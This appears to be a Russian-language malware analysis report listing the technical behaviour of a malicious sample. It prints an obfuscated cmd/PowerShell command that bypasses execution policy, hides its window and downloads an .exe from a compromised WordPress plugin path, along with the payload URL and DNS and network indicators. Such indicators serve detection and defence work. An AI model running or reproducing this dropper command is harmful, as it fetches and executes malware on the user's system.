Техническая информация
- http://aamd.com/wp-content/plugins/acismittor/0dgrhpzx/yl33kcob.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POwE^rsHElL.^Ex^E ^-Ex^EcU^t^ioN^POLICy ^b^Y^PA^S^s ^-NO^proFi^L^e -^w^indOwSTyle H^id^DEn (N^EW^-oBJect^ sySteM.^n^e^T^.wE^bC^LIeNt^).^D^oWnl^Oad^FI^LE('http://aamd.com/wp-c...
- 'aa##.com':80
- http://aa##.com/wp-content/plugins/acismittor/0DGRhPzx/yL33KCoB.exe
- DNS ASK aa##.com
- '<SYSTEM32>\cmd.exe' /C "POwE^rsHElL.^Ex^E ^-Ex^EcU^t^ioN^POLICy ^b^Y^PA^S^s ^-NO^proFi^L^e -^w^indOwSTyle H^id^DEn (N^EW^-oBJect^ sySteM.^n^e^T^.wE^bC^LIeNt^).^D^oWnl^Oad^FI^LE('http://aamd.com/wp-c...' (со скрытым окном)